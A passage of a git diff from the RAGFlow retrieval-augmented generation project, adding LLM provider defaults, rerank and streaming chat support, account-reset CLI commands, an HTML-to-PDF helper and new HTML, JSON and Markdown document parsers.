.where(cls.model.tenant_id == tenant_id, cls.model.llm_name == mdlnm)\
.execute()
except Exception as e:
pass
return num
@classmethod
@DB.connection_context()
def get_openai_models(cls):
objs = cls.model.select().where(
(cls.model.llm_factory == "OpenAI"),
~(cls.model.llm_name == "text-embedding-3-small"),
~(cls.model.llm_name == "text-embedding-3-large")
).dicts()
return list(objs)
class LLMBundle(object):
def __init__(self, tenant_id, llm_type, llm_name=None, lang="Chinese"):
@ -145,6 +178,10 @@ class LLMBundle(object):
tenant_id, llm_type, llm_name, lang=lang)
assert self.mdl, "Can't find mole for {}/{}/{}".format(
tenant_id, llm_type, llm_name)
self.max_length = 512
for lm in LLMService.query(llm_name=llm_name):
self.max_length = lm.max_tokens
break
def encode(self, texts: list, batch_size=32):
emd, used_tokens = self.mdl.encode(texts, batch_size)
@ -162,6 +199,14 @@ class LLMBundle(object):
"Can't update token usage for {}/EMBEDDING".format(self.tenant_id))
return emd, used_tokens
def similarity(self, query: str, texts: list):
sim, used_tokens = self.mdl.similarity(query, texts)
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, used_tokens):
database_logger.error(
"Can't update token usage for {}/RERANK".format(self.tenant_id))
return sim, used_tokens
def describe(self, image, max_tokens=300):
txt, used_tokens = self.mdl.describe(image, max_tokens)
if not TenantLLMService.increase_usage(
@ -170,10 +215,28 @@ class LLMBundle(object):
"Can't update token usage for {}/IMAGE2TEXT".format(self.tenant_id))
return txt
def transcription(self, audio):
txt, used_tokens = self.mdl.transcription(audio)
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, used_tokens):
database_logger.error(
"Can't update token usage for {}/SEQUENCE2TXT".format(self.tenant_id))
return txt
def chat(self, system, history, gen_conf):
txt, used_tokens = self.mdl.chat(system, history, gen_conf)
if TenantLLMService.increase_usage(
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, used_tokens, self.llm_name):
database_logger.error(
"Can't update token usage for {}/CHAT".format(self.tenant_id))
return txt
def chat_streamly(self, system, history, gen_conf):
for txt in self.mdl.chat_streamly(system, history, gen_conf):
if isinstance(txt, int):
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, txt, self.llm_name):
database_logger.error(
"Can't update token usage for {}/CHAT".format(self.tenant_id))
return
yield txt

View File

@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import random
from api.db.db_utils import bulk_insert_into_db
@ -53,6 +54,7 @@ class TaskService(CommonService):
Knowledgebase.embd_id,
Tenant.img2txt_id,
Tenant.asr_id,
Tenant.llm_id,
cls.model.update_time]
docs = cls.model.select(*fields) \
.join(Document, on=(cls.model.doc_id == Document.id)) \
@ -96,11 +98,20 @@ class TaskService(CommonService):
return doc.run == TaskStatus.CANCEL.value or doc.progress < 0
except Exception as e:
pass
return True
return False
@classmethod
@DB.connection_context()
def update_progress(cls, id, info):
if os.environ.get("MACOS"):
if info["progress_msg"]:
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
cls.model.id == id).execute()
if "progress" in info:
cls.model.update(progress=info["progress"]).where(
cls.model.id == id).execute()
return
with DB.lock("update_progress", -1):
if info["progress_msg"]:
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
@ -128,6 +139,8 @@ def queue_tasks(doc, bucket, name):
page_size = doc["parser_config"].get("task_page_size", 22)
if doc["parser_id"] == "one":
page_size = 1000000000
if doc["parser_id"] == "knowledge_graph":
page_size = 1000000000
if not do_layout:
page_size = 1000000000
page_ranges = doc["parser_config"].get("pages")
@ -159,4 +172,4 @@ def queue_tasks(doc, bucket, name):
DocumentService.begin2parse(doc["id"])
for t in tsks:
REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=t)
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=t), "Can't access Redis. Please check the Redis' status."

View File

@ -93,6 +93,7 @@ class TenantService(CommonService):
cls.model.name,
cls.model.llm_id,
cls.model.embd_id,
cls.model.rerank_id,
cls.model.asr_id,
cls.model.img2txt_id,
cls.model.parser_ids,

View File

@ -34,6 +34,7 @@ chat_logger = getLogger("chat")
from rag.utils.es_conn import ELASTICSEARCH
from rag.nlp import search
from graphrag import search as kg_search
from api.utils import get_base_config, decrypt_database_config
API_VERSION = "v1"
@ -69,6 +70,12 @@ default_llm = {
"image2text_model": "gpt-4-vision-preview",
"asr_model": "whisper-1",
},
"Azure-OpenAI": {
"chat_model": "azure-gpt-35-turbo",
"embedding_model": "azure-text-embedding-ada-002",
"image2text_model": "azure-gpt-4-vision-preview",
"asr_model": "azure-whisper-1",
},
"ZHIPU-AI": {
"chat_model": "glm-3-turbo",
"embedding_model": "embedding-2",
@ -86,6 +93,25 @@ default_llm = {
"embedding_model": "",
"image2text_model": "",
"asr_model": "",
},
"DeepSeek": {
"chat_model": "deepseek-chat",
"embedding_model": "",
"image2text_model": "",
"asr_model": "",
},
"VolcEngine": {
"chat_model": "",
"embedding_model": "",
"image2text_model": "",
"asr_model": "",
},
"BAAI": {
"chat_model": "",
"embedding_model": "BAAI/bge-large-zh-v1.5",
"image2text_model": "",
"asr_model": "",
"rerank_model": "BAAI/bge-reranker-v2-m3",
}
}
LLM = get_base_config("user_default_llm", {})
@ -98,14 +124,15 @@ if LLM_FACTORY not in default_llm:
f"LLM factory {LLM_FACTORY} has not supported yet, switch to 'Tongyi-Qianwen/QWen' automatically, and please check the API_KEY in service_conf.yaml.")
LLM_FACTORY = "Tongyi-Qianwen"
CHAT_MDL = default_llm[LLM_FACTORY]["chat_model"]
EMBEDDING_MDL = default_llm[LLM_FACTORY]["embedding_model"]
EMBEDDING_MDL = default_llm["BAAI"]["embedding_model"]
RERANK_MDL = default_llm["BAAI"]["rerank_model"]
ASR_MDL = default_llm[LLM_FACTORY]["asr_model"]
IMAGE2TEXT_MDL = default_llm[LLM_FACTORY]["image2text_model"]
API_KEY = LLM.get("api_key", "")
PARSERS = LLM.get(
"parsers",
"naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One")
"naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph")
# distribution
DEPENDENT_DISTRIBUTION = get_base_config("dependent_distribution", False)
@ -152,6 +179,7 @@ CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get(
"switch", False)
HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")
GITHUB_OAUTH = get_base_config("oauth", {}).get("github")
FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")
WECHAT_OAUTH = get_base_config("oauth", {}).get("wechat")
# site
@ -177,6 +205,7 @@ PRIVILEGE_COMMAND_WHITELIST = []
CHECK_NODES_IDENTITY = False
retrievaler = search.Dealer(ELASTICSEARCH)
kg_retrievaler = kg_search.KGSearch(ELASTICSEARCH)
class CustomEnum(Enum):
@ -218,4 +247,5 @@ class RetCode(IntEnum, CustomEnum):
RUNNING = 106
PERMISSION_ERROR = 108
AUTHENTICATION_ERROR = 109
UNAUTHORIZED = 401
SERVER_ERROR = 500

View File

@ -25,7 +25,6 @@ from flask import (
from werkzeug.http import HTTP_STATUS_CODES
from api.utils import json_dumps
from api.versions import get_rag_version
from api.settings import RetCode
from api.settings import (
REQUEST_MAX_WAIT_SEC, REQUEST_WAIT_SEC,
@ -39,7 +38,6 @@ from base64 import b64encode
from hmac import HMAC
from urllib.parse import quote, urlencode
requests.models.complexjson.dumps = functools.partial(
json.dumps, cls=CustomJSONEncoder)
@ -84,9 +82,6 @@ def request(**kwargs):
return sess.send(prepped, stream=stream, timeout=timeout)
rag_version = get_rag_version() or ''
def get_exponential_backoff_interval(retries, full_jitter=False):
"""Calculate the exponential backoff wait time."""
# Will be zero if factor equals 0
@ -149,7 +144,7 @@ def server_error_response(e):
if len(e.args) > 1:
return get_json_result(
retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e.args[0]), data=e.args[1])
if repr(e).find("index_not_found_exception") >=0:
if repr(e).find("index_not_found_exception") >= 0:
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg="No chunk found, please upload file and parse it.")
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e))
@ -239,3 +234,36 @@ def cors_reponse(retcode=RetCode.SUCCESS,
response.headers["Access-Control-Allow-Headers"] = "*"
response.headers["Access-Control-Expose-Headers"] = "Authorization"
return response
def construct_result(code=RetCode.DATA_ERROR, message='data is missing'):
import re
result_dict = {"code": code, "message": re.sub(r"rag", "seceum", message, flags=re.IGNORECASE)}
response = {}
for key, value in result_dict.items():
if value is None and key != "code":
continue
else:
response[key] = value
return jsonify(response)
def construct_json_result(code=RetCode.SUCCESS, message='success', data=None):
if data is None:
return jsonify({"code": code, "message": message})
else:
return jsonify({"code": code, "message": message, "data": data})
def construct_error_response(e):
stat_logger.exception(e)
try:
if e.code == 401:
return construct_json_result(code=RetCode.UNAUTHORIZED, message=repr(e))
except BaseException:
pass
if len(e.args) > 1:
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e.args[0]), data=e.args[1])
if repr(e).find("index_not_found_exception") >=0:
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message="No chunk found, please upload file and parse it.")
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e))

78
api/utils/commands.py Normal file
View File

@ -0,0 +1,78 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import base64
import click
import re
from flask import Flask
from werkzeug.security import generate_password_hash
from api.db.services import UserService
@click.command('reset-password', help='Reset the account password.')
@click.option('--email', prompt=True, help='The email address of the account whose password you need to reset')
@click.option('--new-password', prompt=True, help='the new password.')
@click.option('--password-confirm', prompt=True, help='the new password confirm.')
def reset_password(email, new_password, password_confirm):
if str(new_password).strip() != str(password_confirm).strip():
click.echo(click.style('sorry. The two passwords do not match.', fg='red'))
return
user = UserService.query(email=email)
if not user:
click.echo(click.style('sorry. The Email is not registered!.', fg='red'))
return
encode_password = base64.b64encode(new_password.encode('utf-8')).decode('utf-8')
password_hash = generate_password_hash(encode_password)
user_dict = {
'password': password_hash
}
UserService.update_user(user[0].id,user_dict)
click.echo(click.style('Congratulations! Password has been reset.', fg='green'))
@click.command('reset-email', help='Reset the account email.')
@click.option('--email', prompt=True, help='The old email address of the account whose email you need to reset')
@click.option('--new-email', prompt=True, help='the new email.')
@click.option('--email-confirm', prompt=True, help='the new email confirm.')
def reset_email(email, new_email, email_confirm):
if str(new_email).strip() != str(email_confirm).strip():
click.echo(click.style('Sorry, new email and confirm email do not match.', fg='red'))
return
if str(new_email).strip() == str(email).strip():
click.echo(click.style('Sorry, new email and old email are the same.', fg='red'))
return
user = UserService.query(email=email)
if not user:
click.echo(click.style('sorry. the account: [{}] not exist .'.format(email), fg='red'))
return
if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$", new_email):
click.echo(click.style('sorry. {} is not a valid email. '.format(new_email), fg='red'))
return
new_user = UserService.query(email=new_email)
if new_user:
click.echo(click.style('sorry. the account: [{}] is exist .'.format(new_email), fg='red'))
return
user_dict = {
'email': new_email
}
UserService.update_user(user[0].id,user_dict)
click.echo(click.style('Congratulations!, email has been reset.', fg='green'))
def register_commands(app: Flask):
app.cli.add_command(reset_password)
app.cli.add_command(reset_email)

View File

@ -156,7 +156,7 @@ def filename_type(filename):
return FileType.PDF.value
if re.match(
r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md)$", filename):
r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md|py|js|java|c|cpp|h|php|go|ts|sh|cs|kt|html)$", filename):
return FileType.DOC.value
if re.match(
@ -174,7 +174,7 @@ def thumbnail(filename, blob):
if re.match(r".*\.pdf$", filename):
pdf = pdfplumber.open(BytesIO(blob))
buffered = BytesIO()
pdf.pages[0].to_image().annotated.save(buffered, format="png")
pdf.pages[0].to_image(resolution=32).annotated.save(buffered, format="png")
return "data:image/png;base64," + \
base64.b64encode(buffered.getvalue()).decode("utf-8")

View File

@ -11,10 +11,11 @@ def crypt(line):
file_utils.get_project_base_directory(),
"conf",
"public.pem")
rsa_key = RSA.importKey(open(file_path).read())
rsa_key = RSA.importKey(open(file_path).read(),"Welcome")
cipher = Cipher_pkcs1_v1_5.new(rsa_key)
return base64.b64encode(cipher.encrypt(
line.encode('utf-8'))).decode("utf-8")
password_base64 = base64.b64encode(line.encode('utf-8')).decode("utf-8")
encrypted_password = cipher.encrypt(password_base64.encode())
return base64.b64encode(encrypted_password).decode('utf-8')
if __name__ == "__main__":

80
api/utils/web_utils.py Normal file
View File

@ -0,0 +1,80 @@
import re
import json
import base64
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import staleness_of
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By
def html2pdf(
source: str,
timeout: int = 2,
install_driver: bool = True,
print_options: dict = {},
):
result = __get_pdf_from_html(source, timeout, install_driver, print_options)
return result
def __send_devtools(driver, cmd, params={}):
resource = "/session/%s/chromium/send_command_and_get_result" % driver.session_id
url = driver.command_executor._url + resource
body = json.dumps({"cmd": cmd, "params": params})
response = driver.command_executor._request("POST", url, body)
if not response:
raise Exception(response.get("value"))
return response.get("value")
def __get_pdf_from_html(
path: str,
timeout: int,
install_driver: bool,
print_options: dict
):
webdriver_options = Options()
webdriver_prefs = {}
webdriver_options.add_argument("--headless")
webdriver_options.add_argument("--disable-gpu")
webdriver_options.add_argument("--no-sandbox")
webdriver_options.add_argument("--disable-dev-shm-usage")
webdriver_options.experimental_options["prefs"] = webdriver_prefs
webdriver_prefs["profile.default_content_settings"] = {"images": 2}
if install_driver:
service = Service(ChromeDriverManager().install())
driver = webdriver.Chrome(service=service, options=webdriver_options)
else:
driver = webdriver.Chrome(options=webdriver_options)
driver.get(path)
try:
WebDriverWait(driver, timeout).until(
staleness_of(driver.find_element(by=By.TAG_NAME, value="html"))
)
except TimeoutException:
calculated_print_options = {
"landscape": False,
"displayHeaderFooter": False,
"printBackground": True,
"preferCSSPageSize": True,
}
calculated_print_options.update(print_options)
result = __send_devtools(
driver, "Page.printToPDF", calculated_print_options)
driver.quit()
return base64.b64decode(result["data"])
def is_valid_url(url: str) -> bool:
return bool(re.match(r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]", url))

View File

@ -14,17 +14,15 @@
# limitations under the License.
#
import os
import dotenv
import typing
from api.utils.file_utils import get_project_base_directory
def get_versions() -> typing.Mapping[str, typing.Any]:
return dotenv.dotenv_values(
dotenv_path=os.path.join(get_project_base_directory(), "rag.env")
)
dotenv.load_dotenv(dotenv.find_dotenv())
return dotenv.dotenv_values()
def get_rag_version() -> typing.Optional[str]:
return get_versions().get("RAG")
return get_versions().get("RAGFLOW_VERSION", "dev")

2214
conf/llm_factories.json Normal file

File diff suppressed because it is too large Load Diff

View File

@ -15,6 +15,8 @@ minio:
host: 'minio:9000'
es:
hosts: 'http://es01:9200'
username: 'elastic'
password: 'infini_rag_flow'
redis:
db: 1
password: 'infini_rag_flow'
@ -28,6 +30,12 @@ oauth:
client_id: xxxxxxxxxxxxxxxxxxxxxxxxx
secret_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
url: https://github.com/login/oauth/access_token
feishu:
app_id: cli_xxxxxxxxxxxxxxxxxxx
app_secret: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
app_access_token_url: https://open.feishu.cn/open-apis/auth/v3/app_access_token/internal
user_access_token_url: https://open.feishu.cn/open-apis/authen/v1/oidc/access_token
grant_type: 'authorization_code'
authentication:
client:
switch: false
@ -38,4 +46,4 @@ authentication:
permission:
switch: false
component: false
dataset: false
dataset: false

View File

@ -1,6 +1,20 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .pdf_parser import RAGFlowPdfParser as PdfParser, PlainParser
from .docx_parser import RAGFlowDocxParser as DocxParser
from .excel_parser import RAGFlowExcelParser as ExcelParser
from .ppt_parser import RAGFlowPptParser as PptParser
from .html_parser import RAGFlowHtmlParser as HtmlParser
from .json_parser import RAGFlowJsonParser as JsonParser
from .markdown_parser import RAGFlowMarkdownParser as MarkdownParser

View File

@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from docx import Document
import re
import pandas as pd
@ -101,19 +113,24 @@ class RAGFlowDocxParser:
def __call__(self, fnm, from_page=0, to_page=100000):
self.doc = Document(fnm) if isinstance(
fnm, str) else Document(BytesIO(fnm))
pn = 0
secs = []
pn = 0 # parsed page
secs = [] # parsed contents
for p in self.doc.paragraphs:
if pn > to_page:
break
if from_page <= pn < to_page and p.text.strip():
secs.append((p.text, p.style.name))
runs_within_single_paragraph = [] # save runs within the range of pages
for run in p.runs:
if pn > to_page:
break
if from_page <= pn < to_page and p.text.strip():
runs_within_single_paragraph.append(run.text) # append run.text first
# wrap page break checker into a static method
if 'lastRenderedPageBreak' in run._element.xml:
pn += 1
continue
if 'w:br' in run._element.xml and 'type="page"' in run._element.xml:
pn += 1
secs.append(("".join(runs_within_single_paragraph), p.style.name)) # then concat run.text as part of the paragraph
tbls = [self.__extract_table_content(tb) for tb in self.doc.tables]
return secs, tbls

View File

@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from openpyxl import load_workbook
import sys
from io import BytesIO
@ -7,30 +19,39 @@ from rag.nlp import find_codec
class RAGFlowExcelParser:
def html(self, fnm):
def html(self, fnm, chunk_rows=256):
if isinstance(fnm, str):
wb = load_workbook(fnm)
else:
wb = load_workbook(BytesIO(fnm))
tb = ""
tb_chunks = []
for sheetname in wb.sheetnames:
ws = wb[sheetname]
rows = list(ws.rows)
if not rows:continue
tb += f"<table><caption>{sheetname}</caption><tr>"
if not rows: continue
tb_rows_0 = "<tr>"
for t in list(rows[0]):
tb += f"<th>{t.value}</th>"
tb += "</tr>"
for r in list(rows[1:]):
tb += "<tr>"
for i, c in enumerate(r):
if c.value is None:
tb += "<td></td>"
else:
tb += f"<td>{c.value}</td>"
tb += "</tr>"
tb += "</table>\n"
return tb
tb_rows_0 += f"<th>{t.value}</th>"
tb_rows_0 += "</tr>"
for chunk_i in range((len(rows) - 1) // chunk_rows + 1):
tb = ""
tb += f"<table><caption>{sheetname}</caption>"
tb += tb_rows_0
for r in list(rows[1 + chunk_i * chunk_rows:1 + (chunk_i + 1) * chunk_rows]):
tb += "<tr>"
for i, c in enumerate(r):
if c.value is None:
tb += "<td></td>"
else:
tb += f"<td>{c.value}</td>"
tb += "</tr>"
tb += "</table>\n"
tb_chunks.append(tb)
return tb_chunks
def __call__(self, fnm):
if isinstance(fnm, str):

View File

@ -0,0 +1,39 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from rag.nlp import find_codec
import readability
import html_text
import chardet
def get_encoding(file):
with open(file,'rb') as f:
tmp = chardet.detect(f.read())
return tmp['encoding']
class RAGFlowHtmlParser:
def __call__(self, fnm, binary=None):
txt = ""
if binary:
encoding = find_codec(binary)
txt = binary.decode(encoding, errors="ignore")
else:
with open(fnm, "r",encoding=get_encoding(fnm)) as f:
txt = f.read()
html_doc = readability.Document(txt)
title = html_doc.title()
content = html_text.extract_text(html_doc.summary(html_partial=True))
txt = f'{title}\n{content}'
sections = txt.split("\n")
return sections

View File

@ -0,0 +1,116 @@
# -*- coding: utf-8 -*-
# The following documents are mainly referenced, and only adaptation modifications have been made
# from https://github.com/langchain-ai/langchain/blob/master/libs/text-splitters/langchain_text_splitters/json.py
import json
from typing import Any, Dict, List, Optional
from rag.nlp import find_codec
class RAGFlowJsonParser:
def __init__(
self, max_chunk_size: int = 2000, min_chunk_size: Optional[int] = None
):
super().__init__()
self.max_chunk_size = max_chunk_size * 2
self.min_chunk_size = (
min_chunk_size
if min_chunk_size is not None
else max(max_chunk_size - 200, 50)
)
def __call__(self, binary):
encoding = find_codec(binary)
txt = binary.decode(encoding, errors="ignore")
json_data = json.loads(txt)
chunks = self.split_json(json_data, True)
sections = [json.dumps(l, ensure_ascii=False) for l in chunks if l]
return sections
@staticmethod
def _json_size(data: Dict) -> int:
"""Calculate the size of the serialized JSON object."""
return len(json.dumps(data, ensure_ascii=False))
@staticmethod
def _set_nested_dict(d: Dict, path: List[str], value: Any) -> None:
"""Set a value in a nested dictionary based on the given path."""
for key in path[:-1]:
d = d.setdefault(key, {})
d[path[-1]] = value
def _list_to_dict_preprocessing(self, data: Any) -> Any:
if isinstance(data, dict):
# Process each key-value pair in the dictionary
return {k: self._list_to_dict_preprocessing(v) for k, v in data.items()}
elif isinstance(data, list):
# Convert the list to a dictionary with index-based keys
return {
str(i): self._list_to_dict_preprocessing(item)
for i, item in enumerate(data)
}
else:
# Base case: the item is neither a dict nor a list, so return it unchanged
return data
def _json_split(
self,
data: Dict[str, Any],
current_path: Optional[List[str]] = None,
chunks: Optional[List[Dict]] = None,
) -> List[Dict]:
"""
Split json into maximum size dictionaries while preserving structure.
"""
current_path = current_path or []
chunks = chunks or [{}]
if isinstance(data, dict):
for key, value in data.items():
new_path = current_path + [key]
chunk_size = self._json_size(chunks[-1])
size = self._json_size({key: value})
remaining = self.max_chunk_size - chunk_size
if size < remaining:
# Add item to current chunk
self._set_nested_dict(chunks[-1], new_path, value)
else:
if chunk_size >= self.min_chunk_size:
# Chunk is big enough, start a new chunk
chunks.append({})
# Iterate
self._json_split(value, new_path, chunks)
else:
# handle single item
self._set_nested_dict(chunks[-1], current_path, data)
return chunks
def split_json(
self,
json_data: Dict[str, Any],
convert_lists: bool = False,
) -> List[Dict]:
"""Splits JSON into a list of JSON chunks"""
if convert_lists:
chunks = self._json_split(self._list_to_dict_preprocessing(json_data))
else:
chunks = self._json_split(json_data)
# Remove the last chunk if it's empty
if not chunks[-1]:
chunks.pop()
return chunks
def split_text(
self,
json_data: Dict[str, Any],
convert_lists: bool = False,
ensure_ascii: bool = True,
) -> List[str]:
"""Splits JSON into a list of JSON formatted strings"""
chunks = self.split_json(json_data=json_data, convert_lists=convert_lists)
# Convert to string
return [json.dumps(chunk, ensure_ascii=ensure_ascii) for chunk in chunks]

View File

@ -0,0 +1,44 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
class RAGFlowMarkdownParser:
def __init__(self, chunk_token_num=128):
self.chunk_token_num = int(chunk_token_num)
def extract_tables_and_remainder(self, markdown_text):
# Standard Markdown table
table_pattern = re.compile(
r'''
(?:\n|^)
(?:\|.*?\|.*?\|.*?\n)
(?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
(?:\|.*?\|.*?\|.*?\n)+
''', re.VERBOSE)
tables = table_pattern.findall(markdown_text)
remainder = table_pattern.sub('', markdown_text)
# Borderless Markdown table
no_border_table_pattern = re.compile(
r'''
(?:\n|^)
(?:\S.*?\|.*?\n)
(?:(?:\s*[:-]+[-| :]*\s*).*?\n)
(?:\S.*?\|.*?\n)+
''', re.VERBOSE)
no_border_tables = no_border_table_pattern.findall(remainder)
tables.extend(no_border_tables)
remainder = no_border_table_pattern.sub('', remainder)
return remainder, tables

View File

@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import random
@ -11,7 +23,7 @@ import logging
from PIL import Image, ImageDraw
import numpy as np
from timeit import default_timer as timer
from PyPDF2 import PdfReader as pdf2_read
from pypdf import PdfReader as pdf2_read
from api.utils.file_utils import get_project_base_directory
from deepdoc.vision import OCR, Recognizer, LayoutRecognizer, TableStructureRecognizer
@ -273,10 +285,10 @@ class RAGFlowPdfParser:
"page_number": pagenum} for b, t in bxs if b[0][0] <= b[1][0] and b[0][1] <= b[-1][1]],
self.mean_height[-1] / 3
)
# merge chars in the same rect
for c in Recognizer.sort_X_firstly(
chars, self.mean_width[pagenum - 1] // 4):
for c in Recognizer.sort_Y_firstly(
chars, self.mean_height[pagenum - 1] // 4):
ii = Recognizer.find_overlapped(c, bxs)
if ii is None:
self.lefted_chars.append(c)
@ -392,11 +404,11 @@ class RAGFlowPdfParser:
b["text"].strip()[-1] in ",;:'\",、‘“;:-",
len(b["text"].strip()) > 1 and b["text"].strip(
)[-2] in ",;:'\",‘“、;:",
b["text"].strip()[0] in "。;?!?”)),,、:",
b_["text"].strip() and b_["text"].strip()[0] in "。;?!?”)),,、:",
]
# features for not concating
feats = [
b.get("layoutno", 0) != b.get("layoutno", 0),
b.get("layoutno", 0) != b_.get("layoutno", 0),
b["text"].strip()[-1] in "。?!?",
self.is_english and b["text"].strip()[-1] in ".!?",
b["page_number"] == b_["page_number"] and b_["top"] -
@ -749,6 +761,7 @@ class RAGFlowPdfParser:
"layoutno", "")))
left, top, right, bott = b["x0"], b["top"], b["x1"], b["bottom"]
if right < left: right = left + 1
poss.append((pn + self.page_from, left, right, top, bott))
return self.page_images[pn] \
.crop((left * ZM, top * ZM,
@ -939,7 +952,7 @@ class RAGFlowPdfParser:
fnm, str) else pdfplumber.open(BytesIO(fnm))
self.page_images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
enumerate(self.pdf.pages[page_from:page_to])]
self.page_chars = [[c for c in page.chars if self._has_color(c)] for page in
self.page_chars = [[{**c, 'top': c['top'], 'bottom': c['bottom']} for c in page.dedupe_chars().chars if self._has_color(c)] for page in
self.pdf.pages[page_from:page_to]]
self.total_page = len(self.pdf.pages)
except Exception as e:
@ -972,7 +985,6 @@ class RAGFlowPdfParser:
self.is_english = True
else:
self.is_english = False
self.is_english = False
st = timer()
for i, img in enumerate(self.page_images):
@ -1008,6 +1020,8 @@ class RAGFlowPdfParser:
self.page_cum_height = np.cumsum(self.page_cum_height)
assert len(self.page_cum_height) == len(self.page_images) + 1
if len(self.boxes) == 0 and zoomin < 9: self.__images__(fnm, zoomin * 3, page_from,
page_to, callback)
def __call__(self, fnm, need_image=True, zoomin=3, return_html=False):
self.__images__(fnm, zoomin)

View File

@ -10,6 +10,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
from io import BytesIO
from pptx import Presentation
@ -51,7 +52,7 @@ class RAGFlowPptParser(object):
break
texts = []
for shape in sorted(
slide.shapes, key=lambda x: (x.top // 10, x.left)):
slide.shapes, key=lambda x: ((x.top if x.top is not None else 0) // 10, x.left)):
txt = self.__extract(shape)
if txt:
texts.append(txt)

View File

@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime

View File

@ -1,3 +1,16 @@
